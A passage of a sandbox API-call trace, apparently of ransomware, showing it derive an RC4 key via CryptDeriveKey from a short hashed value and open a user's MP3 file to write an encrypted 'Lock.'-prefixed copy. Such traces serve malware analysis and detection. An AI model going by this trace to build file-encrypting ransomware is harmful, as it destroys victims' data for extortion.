lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.374] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.374] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.374] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.374] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.374] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.375] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.375] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.375] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.375] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.375] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.375] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.375] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.375] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.375] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.375] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.376] CryptCreateHash (in: hProv=0xa7ca18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.376] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.376] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.376] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.376] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.376] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.376] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.376] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.377] CryptHashData (hHash=0x9e1ab8, pbData=0x2a71b48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.377] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.378] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.378] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab110, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.379] CryptDeriveKey (in: hProv=0xa7ca18, Algid=0x6601, hBaseData=0x9e1ab8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.379] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.379] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.379] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.379] CryptDestroyHash (hHash=0x9e1ab8) returned 1 [0208.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\yxhkkgrmjbmq7xzc.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.381] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.381] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0208.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.382] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0208.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0208.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0208.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0208.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.YXHKkgRMJbmq7xZC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lock.yxhkkgrmjbmq7xzc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0208.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0208.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0208.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0208.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.385] RtlAllocateHeap 